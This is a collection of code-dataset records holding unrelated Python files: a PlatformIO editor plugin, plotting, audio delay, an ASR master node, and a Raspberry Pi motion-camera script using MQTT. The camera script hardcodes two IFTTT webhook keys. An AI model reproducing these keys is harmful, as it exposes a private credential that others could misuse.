[menu_data]\n\t\t\n\t\tmain_user_file_path = DeviotPaths.setDeviotMenuPath()\n\t\tfile_menu = JSONFile(main_user_file_path)\n\t\tfile_menu.setData(menu_data)\n\t\tfile_menu.saveData()\n\nclass Preferences(JSONFile):\n\t\"\"\"Preferences\n\t\n\tClass to handle the preferences of the plugin\n\t\n\tExtends:\n\t\tJSONFile\n\t\"\"\"\n\tdef __init__(self):\n\t\t\"\"\"Construct\n\t\t\n\t\tPath loads the file where the preferences are stored,\n\t\tDoing that you avoid to pass the path every time you\n\t\tneed to get or set any preference.\n\t\t\"\"\"\n\t\tpath = DeviotPaths.getPreferencesFile()\n\t\tsuper(Preferences, self).__init__(path)\n\n\tdef set(self, key, value):\n\t\t\"\"\"Set value\n\t\t\n\t\tSave a value in the preferences file using a list and\n\t\tdictionaries.\n\t\t\n\t\tArguments:\n\t\t\tkey {string} -- identifier of the preference\n\t\t\tvalue {[type]} -- value of the preference\n\t\t\"\"\"\n\t\tself.data[key] = value\n\t\tself.saveData()\n\n\tdef get(self, key, default_value=False):\n\t\t\"\"\"Get Value\n\t\t\n\t\tGet a value in the preferences file stored as a list and\n\t\tdictionaries format.\n\t\t\n\t\tArguments:\n\t\t\tkey {string} -- identifier of the preference\n\t\t\n\t\tKeyword Arguments:\n\t\t\tdefault_value {string} -- if there is none value stored\n\t\t\t\t\t\t\t\t\t you can set a default value (default: False)\n\t\t\n\t\tReturns:\n\t\t \t{string} -- Value of the preference\n\t\t\"\"\"\n\t\tvalue = self.data.get(key, default_value)\n\t\treturn value\n\n\tdef boardSelected(self,board_id):\n\t\t\"\"\"Choosed board\n\t\t\n\t\tAdd or delete the board selected from the preferences\n\t\tfiles. The boards are formated in a dictionary in the\n\t\tthe list 'board id'\n\t\t\n\t\tArguments:\n\t\t\tboard_id {string} -- identifier if the board selected\n\t\t\"\"\"\n\t\tfile_data = self.get('board_id','')\n\n\t\tif(file_data):\n\t\t\tif board_id in file_data:\n\t\t\t\tself.data.setdefault('board_id',[]).remove(board_id)\n\t\t\telse:\t\t\t\n\t\t\t\tself.data.setdefault('board_id',[]).append(board_id)\n\t\t\tself.saveData()\n\t\telse:\n\t\t\tself.set('board_id',[board_id])\n\n\tdef checkBoard(self, board_id):\n\t\t\"\"\"Is checked\n\t\t\n\t\tCheck if is necessary to mark or unmark the board selected \n\t\t\n\t\tArguments:\n\t\t\tboard_id {string} -- identifier of the board selected\n\t\t\"\"\"\n\t\tcheck = False\n\t\tif(self.data):\n\t\t\tcheck_boards = self.get('board_id', '')\n\n\t\t\tif board_id in check_boards:\n\t\t\t\tcheck = True\n\t\treturn check\n\nclass PlatformioCLI(DeviotCommands.CommandsPy):\n\t\"\"\"Platformio\n\t\n\tThis class handle all the request to the platformio ecosystem.\n\tFrom the list of boards to the build/upload of the sketchs.\n\tMore info about platformio in: http://platformio.org/\n\t\n\tExtends:\n\t\tDeviotCommands.CommandsPy\n\t\"\"\"\n\tdef __init__(self, view=False):\n\t\t\"\"\"Construct\n\t\t\n\t\tInitialize the command and preferences classes, to check\n\t\tif the current work file is an IoT type it received the view \n\t\tparameter (ST parameter). This parameter is necessary only in\n\t\tthe options like build or upload.\n\t\t\n\t\tKeyword Arguments:\n\t\t\tview {st object} -- stores many info related with ST (default: False)\n\t\t\"\"\"\n\t\tself.Preferences = Preferences()\n\t\tself.Commands = DeviotCommands.CommandsPy()\n\t\tself.view = view\n\n\t\tif(view):\n\t\t\tself.currentFilePath = DeviotPaths.getCurrentFilePath(view)\n\t\t\tself.cwd = DeviotPaths.getCWD(self.currentFilePath)\n\n\tdef getSelectedBoards(self):\n\t\t\"\"\"Selected Board(s)\n\t\t\n\t\tGet the board(s) list selected, from the preferences file, to\n\t\tbe initialized and formated to be used in the platformio CLI\n\n\t\tReturns:\n\t\t\t{string} boards list in platformio CLI format\n\t\t\"\"\"\n\t\tboards = self.Preferences.get('board_id','')\n\t\ttype_boards = \"\"\n\t\t\n\t\tif(not boards):\n\t\t\treturn False\n\n\t\tfor board in boards:\n\t\t\ttype_boards += \"--board=%s \" % board\n\n\t\treturn type_boards\n\n\tdef initSketchProject(self):\n\t\t\"\"\"CLI\n\t\t\n\t\tcommand to initialize the board(s) selected by the user. This\n\t\tfunction can only be use if the workig file is an IoT type\n\t\t(checked by isIOTFile)\n\t\t\"\"\"\n\t\tinit_boards = self.getSelectedBoards()\n\n\t\tif(not init_boards):\n\t\t\tprint(\"None board Selected\")\n\t\t\treturn\n\n\t\tcommand = \"platformio -f -c sublimetext init %s\" % init_boards\n\t\t\n\t\tif(not isIOTFile(self.view)):\n\t\t\tprint(\"This is not a IoT File\")\n\t\t\treturn\n\n\t\tprint(\"Initializing the project\")\n\t\tself.Commands.runCommand(command, self.cwd)\n\n\tdef buildSketchProject(self):\n\t\t\"\"\"CLI\n\t\t\n\t\tCommand to build the current working sketch, it must to be IoT\n\t\ttype (checked by isIOTFile)\n\t\t\"\"\"\n\t\t# initialize the sketch\n\t\tself.initSketchProject()\n\n\t\tif(not self.Commands.error_running and isIOTFile(self.view)):\n\t\t\tprint(\"Building the project\")\n\n\t\t\ttry:\n\t\t\t\tshutil.copy(self.currentFilePath, self.cwd + '\\\\src')\n\t\t\texcept:\n\t\t\t\tprint(\"error copying the file\")\n\t\t\t\treturn\n\n\t\t\tcommand = \"platformio -f -c sublimetext run\"\n\t\t\tself.Commands.runCommand(command, self.cwd)\n\t\t\t\n\t\t\tif(not self.Commands.error_running):\n\t\t\t\tprint(\"Success\")\n\t\t\t\tself.Preferences.set('builded_sketch',True)\n\t\t\telse:\n\t\t\t\tprint(\"Error\")\n\t\t\t\tself.Preferences.set('builded_sketch',False)\n\n\tdef uploadSketchProject(self):\n\t\t\"\"\"CLI\n\t\t\n\t\tUpload the sketch to the select board to the select COM port\n\t\tit returns an error if any com port is selected\n\t\t\"\"\"\n\t\tbuilded_sketch = self.Preferences.get('builded_sketch','')\n\n\t\tif(builded_sketch):\n\t\t\tid_port = self.Preferences.get('id_port','')\n\t\t\t\n\t\t\tif(not id_port):\n\t\t\t\tprint(\"None COM port selected\")\n\t\t\t\treturn\n\n\t\t\tcommand = \"platformio -f -c sublimetext run -t upload --upload-port %s\" % (id_port)\n\t\t\tself.Commands.runCommand(command, self.cwd)\t\n\n\tdef cleanSketchProject(self):\n\t\t\"\"\"CLI\n\t\t\n\t\tDelete compiled object files, libraries and firmware/program binaries\n\t\tif a sketch has been built previously\n\t\t\"\"\"\n\t\t\n\t\tbuilded_sketch = self.Preferences.get('builded_sketch','')\n\n\t\tif(builded_sketch):\n\t\t\tprint(\"Cleaning\")\n\t\t\tcommand = \"platformio -f -c sublimetext run -t clean\"\n\t\t\tself.Commands.runCommand(command, self.cwd)\n\n\t\t\tif(not self.Commands.error_running):\n\t\t\t\tself.Preferences.set('builded_sketch',False)\n\n\n\tdef getAPICOMPorts(self):\n\t\t\"\"\"CLI\n\t\t\n\t\tGet a JSON list with all the COM ports availables, to do it uses the\n\t\tplatformio serialports command. To get more info about this fuction\n\t\tcheck: http://docs.platformio.org/en/latest/userguide/cmd_serialports.html\n\t\t\"\"\"\n\t\tcommand = \"platformio -f -c sublimetext serialports list --json-output\"\n\t\tport_list = json.loads(self.Commands.runCommand(command,setReturn=True))\n\n\t\tif(not self.Commands.error_running):\n\t\t\treturn port_list\n\n\tdef getAPIBoards(self):\n\t\t\"\"\"Get boards list\n\t\t\n\t\tGet the boards list from the platformio API using CLI.\n\t\tto know more about platformio visit: http://www.platformio.org/\n\n\t\tReturns: \n\t\t \t{json object} -- list with all boards in a JSON format\n\t\t\"\"\"\n\t\tboards = []\n\t\tcommand = \"platformio -f -c sublimetext boards --json-output\"\n\t\tboards = self.Commands.runCommand(command,setReturn=True)\n\t\treturn boards\n\n\ndef isIOTFile(view):\n\t\"\"\"IoT File\n\t\n\tCheck if the file in the current view of ST is an allowed\n\tIoT file, the files are specified in the exts variable.\n\t\n\tArguments:\n\t\tview {st object} -- stores many info related with ST\n\t\"\"\"\n\texts = ['ino','pde','cpp','c','.S']\n\tfile_name = view.file_name()\n\n\tif file_name and file_name.split('.')[-1] in exts:\n\t\treturn True\n\treturn False\n\ndef setStatus(view):\n\t\"\"\"Status bar\n\t\n\tSet the info to show in the status bar of Sublime Text.\n\tThis info is showing only when the working file is considered IoT\n\t\n\tArguments:\n\t\tview {st object} -- stores many info related with ST\n\t\"\"\"\n\tinfo = []\n\n\tif isIOTFile(view):\t\t\n\t\tinfo.append('Deviot ' + getVersion())\n\t\tfull_info = \" | \".join(info)\n\n\t\tview.set_status('Deviot', full_info)\n\n\n\ndef getVersion():\n\t\"\"\"Plugin Version\n\t\n\tGet the current version of the plugin stored in the preferences file.\n\n\tReturns:\n\t \t{String} -- Version of the file (only numbers)\n\t\"\"\"\n\treturn Preferences().get('plugin_version')\n\ndef setVersion(version):\n\t\"\"\"Plugin Version\n\t\n\tSave the current version of the plugin in the preferences file.\n\n\tReturns:\n\t \t{String} -- Version of the file (only numbers)\n\t \"\"\"\n\tPreferences().set('plugin_version',version)","sub_path":"DeviotFunctions.py","file_name":"DeviotFunctions.py","file_ext":"py","file_size_in_byte":14414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"511966824","text":"import numpy as np\n\n\ndef vertexes_to_projective(vertexes):\n return np.concatenate([vertexes[:, :].copy(), np.ones(vertexes.shape[0]).reshape(-1, 1)], axis=1)\n\n\ndef trans_matrix(alpha, beta, gamma):\n tr_matrix = np.array(\n [[1, 0, 0, alpha],\n [0, 1, 0, beta],\n [0, 0, 1, gamma],\n [0, 0, 0, 1]],\n dtype=np.float64\n )\n return tr_matrix","sub_path":"affine_transformations/transfer_matrix.py","file_name":"transfer_matrix.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"576022302","text":"# Libraries Imported\nimport RPi.GPIO as GPIO\nimport paho.mqtt.client as mqtt\n\nfrom picamera import PiCamera\nfrom datetime import datetime\n\nimport time\nimport sys\nimport requests\nimport _thread\n\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\n\n\ncamera_sys = PiCamera()\n\n\n# Procedure to Notify Argon_AC_3 of movement detection at the Entryway\ndef argon_notification_procedure():\n print(\"Thread Starting for Argon_AC_3 Notification\")\n timer_x = 0\n while timer_x < 10:\n # Secondary Client to communicate from RPi to Argon_AC_3\n secondary_client = mqtt.Client(\"Reception_2_mqtt\")\n secondary_client.connect(\"test.mosquitto.org\", 1883)\n secondary_client.subscribe(\"argon_Log_AC_3\")\n secondary_client.publish(\"RPi_AC\", \"Active\")\n print(\"Sending data to ARGON; Active; time:\" + str(timer_x))\n time.sleep(1)\n timer_x += 1\n\n secondary_client = mqtt.Client(\"Reception_2_mqtt\")\n secondary_client.connect(\"test.mosquitto.org\", 1883)\n secondary_client.subscribe(\"argon_Log_AC_3\")\n secondary_client.publish(\"RPi_AC\", \"Non_Active\")\n print(\"Sending data to ARGON; Non_ACTIVE\")\n\n secondary_client.unsubscribe(\"argon_Log_AC_3\")\n\n print(\"Thread Exiting for Argon_AC_3 Notification\")\n _thread.exit()\n\n\n# Procedure to record Entryway after movement is detected\ndef camera_procedure():\n print(\"Thread Starting for Camera\")\n print(\"Camera Starting\")\n\n # Rotate Camera Imaging 180 Degrees\n camera_sys.rotation = 180\n\n # Pre-formate of Video File\n file_capture = \"Entranceway Recording at \" + time.strftime(\"%Y-%m-%d---%H-%M-%S\") + \".h264\"\n\n # Recording Entryway as a 7 Second Video\n camera_sys.start_recording(file_capture)\n time.sleep(7)\n camera_sys.stop_recording()\n\n print(\"Video Recorded\")\n time.sleep(2)\n\n print(\"Notifying User of Front Door Movement and Camera Recording\")\n requests.post(\"https://maker.ifttt.com/trigger/ARGON_AC_TEST_DETECTED_MOVEMENT/with/key/eU_JJJKmZOp_tczeQ56DCVRWKFmnvYPiAZ1fMz0oI6U\")\n requests.post(\"https://maker.ifttt.com/trigger/ARGON_AC_TEST_DETECTED_MOVEMENT/with/key/kI1LT7uJS81esfqdszCu4yNQw8Hace1mnJuhl3j-Q6-\")\n\n print(\"Thread Exiting for Camera\")\n _thread.exit()\n\n\n# Function which launches when a message is received from Argon_AC_Test (The Motion Sensor)\ndef message_function(client, userdata, message):\n # Decoding the Payload in the message\n topic = str(message.topic)\n message = str(message.payload.decode(\"utf-8\"))\n message.replace(\"argon_Log_AC_TEST\", '')\n\n # Converting message into integer\n range_in_centimetres = int(message)\n\n # IF Statement that stops client loop and launches multiple threads if movement is detected\n if (range_in_centimetres < 100):\n print(\"Movement Detected at the Front Door\")\n\n print(\"Stopping MQTT Connection Loop\")\n client.loop_stop()\n\n # Thread 1: Camera Procedure\n _thread.start_new_thread(camera_procedure, ())\n\n # Thread 2: Argon Notification Procedure\n _thread.start_new_thread(argon_notification_procedure, ())\n\n\n print(\"Procedure Exited, Restarting MQTT Connection Loop\")\n main()\n\n else:\n print(\"Doorway clear\")\n\n\ndef main():\n try:\n # Primary Client Between Argon_AC_TEST and RPi\n primary_client = mqtt.Client(\"Reception_1_mqtt\")\n primary_client.connect(\"test.mosquitto.org\", 1883)\n primary_client.subscribe(\"argon_Log_AC_TEST\")\n primary_client.on_message = message_function\n primary_client.loop_start()\n\n # while(1):\n # time.sleep(1)\n\n except:\n KeyboardInterrupt()\n\n\nmain()\n","sub_path":"RPi_Motion_Camera_Threaded.py","file_name":"RPi_Motion_Camera_Threaded.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"438633331","text":"#!/usr/bin/env python\n# a stacked bar plot with errorbars\nfrom pylab import *\n\nN = 5\nmenMeans = (20, 35, 30, 35, 27)\nwomenMeans = (25, 32, 34, 20, 25)\nmenStd = (2, 3, 4, 1, 2)\nwomenStd = (3, 5, 2, 3, 3)\nind = arange(N) # the x locations for the groups\nwidth = 0.35 # the width of the bars: can also be len(x) sequence\n\np1 = bar(ind, menMeans, width, color='r', yerr=womenStd)\np2 = bar(ind, womenMeans, width, color='y',\n bottom=menMeans, yerr=menStd)\n\nylabel('Scores')\ntitle('Scores by group and gender')\nxticks(ind+width/2., ('G1', 'G2', 'G3', 'G4', 'G5') )\nyticks(arange(0,81,10))\nlegend( (p1[0], p2[0]), ('Men', 'Women') )\n\nshow()\n","sub_path":"sandbox/src1/examples/bar_stacked.py","file_name":"bar_stacked.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"620343558","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nsys.path.insert(0, os.path.join(os.path.dirname(sys.argv[0]),'autoProcess/'))\nimport logging\n\nimport migratecfg\nimport autoProcessMusic\nfrom nzbToMediaEnv import *\nfrom nzbToMediaUtil import *\n\n#check to migrate old cfg before trying to load.\nif os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), \"autoProcessMedia.cfg.sample\")):\n migratecfg.migrate()\n\nnzbtomedia_configure_logging(os.path.dirname(sys.argv[0]))\nLogger = logging.getLogger(__name__)\n\nLogger.info(\"====================\") # Seperate old from new log\nLogger.info(\"nzbToHeadPhones %s\", VERSION)\n\n# SABnzbd\nif len(sys.argv) == SABNZB_NO_OF_ARGUMENTS:\n # SABnzbd argv:\n # 1 The final directory of the job (full path)\n # 2 The original name of the NZB file\n # 3 Clean version of the job name (no path info and \".nzb\" removed)\n # 4 Indexer's report number (if supported)\n # 5 User-defined category\n # 6 Group that the NZB was posted in e.g. alt.binaries.x\n # 7 Status of post processing. 0 = OK, 1=failed verification, 2=failed unpack, 3=1+2\n Logger.info(\"Script triggered from SABnzbd, starting autoProcessMusic...\")\n result = autoProcessMusic.process(sys.argv[1], sys.argv[2], sys.argv[7])\n# NZBGet\nelif len(sys.argv) == NZBGET_NO_OF_ARGUMENTS:\n # NZBGet argv:\n # 1 The final directory of the job (full path)\n # 2 The original name of the NZB file\n # 3 The status of the download: 0 == successful\n Logger.info(\"Script triggered from NZBGet, starting autoProcessMusic...\")\n result = autoProcessMusic.process(sys.argv[1], sys.argv[2], sys.argv[3])\nelse:\n Logger.warn(\"Invalid number of arguments received from client.\")\n Logger.info(\"Running autoProcessMusic as a manual run...\")\n result = autoProcessMusic.process('Manual Run', 'Manual Run', 0)\n","sub_path":"nzbToHeadPhones.py","file_name":"nzbToHeadPhones.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"238197660","text":"#!/usr/bin/env python3\nimport os\n\ndef split_file(filepath, lines=300): # specify number of lines per file\n path, filename = os.path.split(filepath)\n # filename.split('.') would not work for filenames with more than one .\n basename, ext = os.path.splitext(filename)\n # open input file\n with open(filepath, 'r') as f_in:\n try:\n # open the first output file\n f_out = open(os.path.join(path, '{}_{}{}'.format(basename, 0, ext)), 'w')\n # loop over all lines in the input file, and number them\n for i, line in enumerate(f_in):\n # every time the current line number can be divided by the\n # wanted number of lines, close the output file and open a\n # new one\n if i % lines == 0:\n f_out.close()\n f_out = open(os.path.join(path, '{}_{}{}'.format(basename, i, ext)), 'w')\n # write the line to the output file\n f_out.write(line)\n finally:\n f_out.close()\n \nif __name__ == '__main__':\n with open('split_file.txt', 'w') as f:\n for x in range(950): # the last line to split\n f.write('{}\\n'.format(x))\n split_file('file_to_split.txt')\n","sub_path":"python/splitFileByLine.py","file_name":"splitFileByLine.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"17344655","text":"import pytest\n\nfrom MicroTokenizer.tokenizers.hmm_tokenizer import HMMTokenizer\nfrom MicroTokenizer import default_model_dir\n\n\n@pytest.mark.parametrize(\"input_text\", pytest.helpers.tokenizer_test_cases())\ndef test_persist(tmpdir, input_text):\n temp_path = tmpdir.mkdir(\"hmm\")\n temp_path_str = str(temp_path)\n\n tokenizer = HMMTokenizer()\n tokenizer.train([[\"我\", \"是\", \"中国人\"], [\"你\", \"打\", \"人\"]])\n tokenizer.save(temp_path_str)\n assert len(temp_path.listdir()) == 3\n\n roundtrip_tokenizer = HMMTokenizer.load(temp_path)\n result = roundtrip_tokenizer.segment(input_text)\n pytest.helpers.assert_token_equals(result, input_text)\n\n\n@pytest.mark.parametrize(\"input_text\", pytest.helpers.tokenizer_test_cases())\ndef test_segment(input_text):\n tokenizer = HMMTokenizer.load(default_model_dir)\n\n result = tokenizer.segment(input_text)\n\n pytest.helpers.assert_token_equals(result, input_text)\n","sub_path":"tests/tokenizers/test_hmm_tokenizer.py","file_name":"test_hmm_tokenizer.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"104782392","text":"import zmq\nimport time, logging, os\nfrom collections import defaultdict\nfrom cloudasr import Poller\nfrom cloudasr.messages import HeartbeatMessage\nfrom cloudasr.messages.helpers import *\n\ndef create_master(worker_address, frontend_address, monitor_address):\n logging.basicConfig(level=os.environ['LOG_LEVEL'] or logging.INFO, format='%(levelname)s: %(asctime)s: %(message)s')\n poller = create_poller(worker_address, frontend_address)\n context = zmq.Context()\n monitor = context.socket(zmq.PUSH)\n monitor.connect(monitor_address)\n run_forever = lambda: True\n\n return Master(poller, monitor, run_forever)\n\n\ndef create_poller(worker_address, frontend_address):\n context = zmq.Context()\n worker_socket = context.socket(zmq.PULL)\n worker_socket.bind(worker_address)\n frontend_socket = context.socket(zmq.REP)\n frontend_socket.bind(frontend_address)\n\n sockets = {\n \"worker\": {\"socket\": worker_socket, \"receive\": worker_socket.recv, \"send\": worker_socket.send_json},\n \"frontend\": {\"socket\": frontend_socket, \"receive\": frontend_socket.recv, \"send\": frontend_socket.send},\n }\n time_func = time.time\n\n return Poller(sockets, time_func)\n\n\nclass Master:\n\n def __init__(self, poller, monitor, should_continue):\n self.poller = poller\n self.should_continue = should_continue\n self.workers = WorkerPool(monitor)\n self.time = 0\n\n def run(self):\n logging.info(\"Master node successfully set up and running...\")\n while self.should_continue():\n messages, self.time = self.poller.poll()\n\n if \"worker\" in messages:\n self.handle_worker_request(messages[\"worker\"])\n\n if \"frontend\" in messages:\n self.handle_fronted_request(messages[\"frontend\"])\n\n def handle_fronted_request(self, message):\n try:\n request = parseWorkerRequestMessage(message)\n model = request.model\n worker = self.workers.get_worker(model, self.time)\n\n message = createMasterResponseMessage(\"SUCCESS\", worker)\n self.poller.send(\"frontend\", message.SerializeToString())\n except NoWorkerAvailableException:\n message = createMasterResponseMessage(\"ERROR\")\n self.poller.send(\"frontend\", message.SerializeToString())\n\n def handle_worker_request(self, message):\n statuses = {\n HeartbeatMessage.STARTED: \"STARTED\",\n HeartbeatMessage.WAITING: \"WAITING\",\n HeartbeatMessage.WORKING: \"WORKING\",\n HeartbeatMessage.FINISHED: \"FINISHED\"\n }\n\n heartbeat = parseHeartbeatMessage(message)\n address = heartbeat.address\n model = heartbeat.model\n status = statuses[heartbeat.status]\n\n self.workers.add_worker(model, address, status, self.time)\n\n\nclass WorkerPool:\n\n def __init__(self, monitor):\n self.workers_status = defaultdict(lambda: {\"status\": \"STARTED\", \"last_heartbeat\": 0, \"waiting_for_first_chunk_secs\": 0})\n self.available_workers = defaultdict(list)\n self.monitor = monitor\n\n def get_worker(self, model, time):\n worker = self.find_available_worker(model, time)\n\n if worker is None:\n raise NoWorkerAvailableException()\n\n self.update_worker_status(model, worker, \"WORKING\", time)\n return worker\n\n def find_available_worker(self, model, time):\n logging.info(\"Finding available worker for the model {}\".format(model))\n logging.info(self.available_workers[model])\n logging.info(self.workers_status)\n while len(self.available_workers[model]) > 0:\n worker = self.available_workers[model].pop(0)\n logging.info(\"Is worker available?\")\n logging.info(worker)\n logging.info(self.is_worker_available(worker, time))\n\n if self.is_worker_available(worker, time):\n return worker\n\n return None\n\n def is_worker_available(self, worker, time):\n status = self.workers_status[worker]\n return status[\"status\"] and status[\"last_heartbeat\"] > time - 10\n\n def add_worker(self, model, address, status, time):\n worker_status = self.workers_status[address][\"status\"]\n logging.info(\"Handling worker heartbeat. worker_status: {}, address: {}\".format(worker_status, address))\n if worker_status == \"WORKING\":\n if status == \"FINISHED\" or status == \"STARTED\":\n self.available_workers[model].append(address)\n self.update_worker_status(model, address, \"WAITING\", time)\n\n if status == \"WORKING\":\n self.update_worker_status(model, address, \"WORKING\", time)\n\n if status == \"WAITING\":\n self.workers_status[address][\"waiting_for_first_chunk_secs\"] += 1\n\n if self.workers_status[address][\"waiting_for_first_chunk_secs\"] == 10:\n self.available_workers[model].append(address)\n self.update_worker_status(model, address, \"WAITING\", time)\n elif worker_status == \"STARTED\":\n logging.info(\"Worker successfully established connection. Its model is: {}, Address: {}, Status: {}\".format(model, address, status))\n self.available_workers[model].append(address)\n self.update_worker_status(model, address, \"STARTED\", time)\n elif worker_status == \"WAITING\":\n self.update_worker_status(model, address, \"WAITING\", time)\n\n def update_worker_status(self, model, worker, status, time):\n self.workers_status[worker] = {\n \"status\": \"WAITING\" if status == \"STARTED\" else status,\n \"last_heartbeat\": time,\n \"waiting_for_first_chunk_secs\": 0\n }\n\n worker_status = createWorkerStatusMessage(worker, model, status, int(time))\n self.monitor.send(worker_status.SerializeToString())\n logging.info(\"Send worker status to the monitor : {}, Status: {}, worker: {}\".format(model, status, worker))\n\n\nclass NoWorkerAvailableException(Exception):\n pass\n","sub_path":"cloudasr/master/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":6059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"613688036","text":"senha = int(input(\"Informe a senha: \"))\n\nnum1 = senha // 100000\nnum2 = senha // 10000 % 10\nnum3 = senha // 1000 % 10\nnum4 = senha // 100 % 10\nnum5 = senha // 10 % 10\nnum6 = senha % 10\n\nsoma1 = num2 + num4 + num6\nsoma2 = num1 + num3 + num5\n\nif ((soma1 % soma2) == 0):\n\tprint (\"acesso liberado\")\nelse:\n\tprint (\"senha invalida\")\n","sub_path":"5 - Notebooks e Data/1 - Análises num��ricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/223/users/4187/codes/1644_2446.py","file_name":"1644_2446.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"113784564","text":"# play_wav_stereo.py\n\nimport pyaudio\nimport wave\nimport struct\nimport math\n\ndef clip16( x ): \n # Clipping for 16 bits\n if x > 32767:\n x = 32767\n elif x < -32768:\n x = -32768\n else:\n x = x \n return int(x)\n\ngain = 0.9\ngain1 = 0.8\n# wavfile = \"cat01.wav\"\n# wavfile = 'sin01_mono.wav'\nwavfile = 'sin01_stereo.wav'\n\nprint(\"Play the wave file %s.\" % wavfile)\n\nwf = wave.open( wavfile, 'rb' )\n\n# Read the wave file properties\nnum_channels = wf.getnchannels() \t# Number of channels\nFs = wf.getframerate() # Sampling rate (frames/second)\nsignal_length = wf.getnframes() \t# Signal length\nwidth = wf.getsampwidth() \t\t# Number of bytes per sample\n\nprint(\"The file has %d channel(s).\" % num_channels)\nprint(\"The frame rate is %d frames/second.\" % Fs)\nprint(\"The file has %d frames.\" % signal_length)\nprint(\"There are %d bytes per sample.\" % width)\n\n# ----------------------------------\n\n# Set parameters of delay system\nGfb = 0.8 # feed-back gain\ng0 = 0.9 # direct-path gain\ng11 = 1.0 # a feed-forward gain\n # a feed-forward gain\ng21 = 1.0\n# g22 = 0.8\n# Set g0 = Gdp, g1 = 0, g2 = Gff to recover system in feedbackdelay_circbuffer.py\n# (Check..)\n\ndelay1_sec = 0.4\ndelay2_sec = 0.5 # delay2_sec > delay1_sec\n\ndelay1 = int( math.floor( Fs * delay1_sec ) ) # Delay in samples\ndelay2 = int( math.floor( Fs * delay2_sec ) ) \n\n# Create a delay line (buffer) to store past values. Initialize to zero.\n\nbuffer_length1 = delay1\nbuffer_length2 = delay2 # minimal-length buffer\nbuffer1 = [ 0 for i in range(buffer_length1) ] \nbuffer2 = [ 0 for j in range(buffer_length2) ] \n\nprint('The delay of {0:.3f} seconds is {1:d} samples.'.format(delay1_sec, delay1))\nprint('The delay of {0:.3f} seconds is {1:d} samples.'.format(delay2_sec, delay2))\nprint('My buffer is of length {0:d}'.format(buffer_length1))\n\n# ----------------------------------\n\np = pyaudio.PyAudio()\n\nstream = p.open(format = pyaudio.paInt16,\n channels = num_channels,\n rate = Fs,\n input = False,\n output = True )\n\ninput_string = wf.readframes(1) # Read first frame\n\n\n\nk = 0\nm1 = 2\nm11 = 0\nm2 = 2\nm22 =0\n\nprint (\"**** playing ****\")\nwhile input_string != '':\n\n # Convert string to numbers\n input_tuple = struct.unpack('hh', input_string) # produces a two-element tuple\n\n\n buffer1[k] = gain * input_tuple[0] \n buffer2[k] = gain1 * input_tuple[1] \n\n # Compute output values\n output_value0 = clip16(gain * input_tuple[0] + g11 * buffer2[m2-1])\n output_value1 = clip16(gain1 * input_tuple[1] + g21 * buffer1[m1-1] )\n\n \n\n k = k + 1\n m1 = m1 + 1\n m2 = m2 + 1\n if k == buffer_length1:\n k = 0\n if m1 >= buffer_length1:\n m1 = 0\n if m2 >= buffer_length2:\n m2 = 0\n\n # Convert output value to binary string\n output_string = struct.pack('hh', output_value0, output_value1)\n\n # Write output value to audio stream\n stream.write(output_string)\n\n # Get next frame\n input_string = wf.readframes(1)\n\nprint(\"**** Done ****\")\n\nstream.stop_stream()\nstream.close()\np.terminate()\n\n\n\n\n\n\n","sub_path":"Lab3 /Lab_3_ASGMNT_3_4_kwc305.py","file_name":"Lab_3_ASGMNT_3_4_kwc305.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"449393274","text":"import ctypes\nimport sdl2\n\nfrom rendrer import Renderer\n\n\nclass Window:\n DEFAULT_WIDTH = 400\n DEFAULT_HEIGHT = 400\n\n def __init__(self, title, width=DEFAULT_WIDTH, height=DEFAULT_HEIGHT):\n sdl2.SDL_Init(sdl2.SDL_INIT_VIDEO)\n self.sdl_window = sdl2.SDL_CreateWindow(\n title,\n sdl2.SDL_WINDOWPOS_CENTERED,\n sdl2.SDL_WINDOWPOS_CENTERED,\n width,\n height,\n sdl2.SDL_WINDOW_RESIZABLE\n )\n self._renderer = Renderer(self)\n self.resize()\n\n @property\n def size(self):\n width = ctypes.c_int()\n height = ctypes.c_int()\n sdl2.SDL_GetWindowSize(self.sdl_window, ctypes.byref(width), ctypes.byref(height))\n return width.value, height.value\n\n def resize(self):\n self._renderer.resize()\n\n def on_key_pressed(self, key_code):\n self._renderer.on_key_pressed(key_code)\n\n def on_key_up(self, key_code):\n self._renderer.on_key_up(key_code)\n\n def close(self):\n sdl2.SDL_DestroyWindow(self.sdl_window)\n sdl2.SDL_Quit()\n\n","sub_path":"window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"94504268","text":"import xarray as xr\nimport xarray.ufuncs as xu\nimport matplotlib.pyplot as plt\nfrom matplotlib import colors\nimport numpy as np\nimport cartopy.crs as ccrs\nimport sys\nplt.rcParams.update({'font.size':18})\nvariable='thetao700'\n\nsurf_path='/DataArchive/C3S/subsurf_temp'\n\nds = xr.open_dataset(surf_path+'/Results/thetao_700m_ORCA-0.25x0.25_regular_1979_2018.nc')\nvar = ds[variable] - ds[variable].mean('time')\nweights = np.cos(ds.lat*np.pi/180)\n\nhov_nino = 